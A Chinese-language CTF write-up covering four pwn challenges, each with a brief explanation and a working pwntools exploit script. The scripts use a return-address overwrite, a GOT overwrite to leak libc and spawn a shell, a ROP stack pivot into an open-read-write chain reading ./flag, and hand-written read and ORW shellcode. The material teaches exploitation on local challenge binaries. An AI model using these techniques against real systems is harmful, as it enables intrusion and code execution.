题目给了后门,但是关闭了标准输出流,所以需要exec 1>&0,将标准输出流转到屏幕上。
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *
local = 1
debug = 1
binary = "./vuln"
elf = ELF(binary)
if local:
p = process(binary)
lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
ip = ""
port = ""
p = remote(ip, port)
lib = ""
init(lib, binary, p)
context = init_context(debug)
if lib != "":
libc = ELF(lib)
if debug and local:
ggdb()
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
lg = lambda buf : lg_update(name(buf), buf)
shell_addr = 0x401176
pad = b'a' * (0x10 + 8)
pad += p64(0x40118C)
pad += p64(shell_addr)
# raw_input()
s(pad)
sleep(0.5)
sl("exec 1>&0")
sh()
|
题目打bss段,只做了大于的限制,用负数可以打前面的got表,因为无法控制rip,但好在vuln最后一步是执行exit退出,而不是return,所以第一步打exit的got表为main函数,这样程序会永远循环,然后打puts的got表泄露libc基地址,最后打puts的got表为system,因为vuln会执行puts,所以直接往参数里传入/bin/sh\x00即可。
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *
local = 1
debug = 1
binary = "./vuln"
elf = ELF(binary)
if local:
p = process(binary)
lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
ip = ""
port = ""
p = remote(ip, port)
lib = ""
init(lib, binary, p)
context = init_context(debug)
if lib != "":
libc = ELF(lib)
if debug and local:
ggdb()
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
lg = lambda buf : lg_update(name(buf), buf)
main = 0x4012D1
ru(b'choose one.\n')
sl('-6')
ru(b'please input your name\n')
pad1 = p64(main)
s(pad1)
ru(b'choose one.\n')
sl('-9')
ru(b'please input your name\n')
pad2 = b'a' * 8
s(pad2)
libc_base = r7f() - libc.sym['puts']
lg(libc_base)
ru(b'choose one.\n')
sl('-9')
ru(b'please input your name\n')
pad3 = b'/bin/sh\x00'
pad3 += p64(libc.sym['system'])
s(pad3)
sh()
|
简单的orw,程序开了沙盒禁用了execve,泄露libc然后orw即可,但问题是,vuln里只能溢出控制0x28个字节,无法给orw参数赋值,所以需要迁移一下,即在orw之前加上一个read,往一个可读可写入的地方布置栈帧,还有就是orw,的flag,我是往另一个可读可写地址写入./flag字符串,然后orw即可。
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *
local = 1
debug = 1
binary = "./vuln"
elf = ELF(binary)
if local:
p = process(binary)
lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
ip = ""
port = ""
p = remote(ip, port)
lib = ""
init(lib, binary, p)
context = init_context(debug)
if lib != "":
libc = ELF(lib)
if debug and local:
ggdb()
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
lg = lambda buf : lg_update(name(buf), buf)
padding = 0x100 + 8
pop_rdi_ret = 0x401393
ret = 0x40101a
main = 0x40130C
pad1 = b'a' * padding
pad1 += p64(pop_rdi_ret)
pad1 += p64(elf.got['puts'])
pad1 += p64(elf.plt['puts'])
pad1 += p64(main)
ru(b'this task.\n')
s(pad1)
libc_base = r7f() - libc.sym['puts']
lg(libc_base)
# 这里没有rdx是因为上面read的rdx为0x130,而且也不够
pad2 = b'b' * (padding-8)
pad2 += p64(0x404048) # rbp
pad2 += p64(gadget('pop rsi;ret'))
pad2 += p64(0x404048)
pad2 += p64(libc.sym['read'])
pad2 += p64(0x4012EE) # leave ret
ru(b'this task.\n')
s(pad2)
# 读入'./flag'的read
pad3 = b'a' * 8
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404038)
pad3 += p64(libc.sym['read'])
# open
pad3 += p64(pop_rdi_ret)
pad3 += p64(0x404038)
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0)
pad3 += p64(libc.sym['open'])
# read
pad3 += p64(pop_rdi_ret)
pad3 += p64(3) # fd
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404048)
pad3 += p64(gadget('pop rdx;ret'))
pad3 += p64(0x30)
pad3 += p64(libc.sym['read'])
# write
pad3 += p64(pop_rdi_ret)
pad3 += p64(1)
pad3 += p64(gadget('pop rsi;ret'))
pad3 += p64(0x404048)
pad3 += p64(gadget('pop rdx;ret'))
pad3 += p64(0x30)
pad3 += p64(libc.sym['write'])
s(pad3)
# raw_input()
s(b'./flag')
sh()
|
题目虽然保护全开,但是会有一个执行写入的操作,有0x10个字节,所以需要靠这0x10个字节来实现对mmap出来的地址的写入,所以需要手动写一个shellcode,来实现执行read写入mmap出来的地址,之后因为沙盒禁止execve所以用自己的read执行orw即可。
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from ckyan.pwn.my_script import *
# from ckyan.pwn.my_libcsearch import *
local = 1
debug = 1
binary = "./vuln"
elf = ELF(binary)
if local:
p = process(binary)
lib = "/lib/x86_64-linux-gnu/libc.so.6"
else:
ip = ""
port = ""
p = remote(ip, port)
lib = ""
init(lib, binary, p)
context = init_context(debug)
if lib != "":
libc = ELF(lib)
if debug and local:
ggdb()
name = lambda obj : [name for name in globals() if globals()[name] is obj][0]
lg = lambda buf : lg_update(name(buf), buf)
# pad1 = asm('mov rax,0')
pad1 = asm('xor rdi,rdi')
pad1 += asm('mov rsi,rdx')
pad1 += asm('mov rdx,0x100')
pad1 += asm('syscall')
print(len(pad1)) # 15 < 0x10
# raw_input()
ru(b'Please input your shellcode:\n')
s(pad1)
# 长度足够,找个orw的shellcode即可。
shellcode = asm('''
push 0x67616c66
mov rdi,rsp
xor esi,esi
push 2
pop rax
syscall
mov rdi,rax
mov rsi,rsp
mov edx,0x100
xor eax,eax
syscall
mov edi,1
mov rsi,rsp
push 1
pop rax
syscall
''')
pad2 = b'a' * 0xf
pad2 += shellcode
sleep(1)
print(len(pad2))
# raw_input()
s(pad2)
sh()
|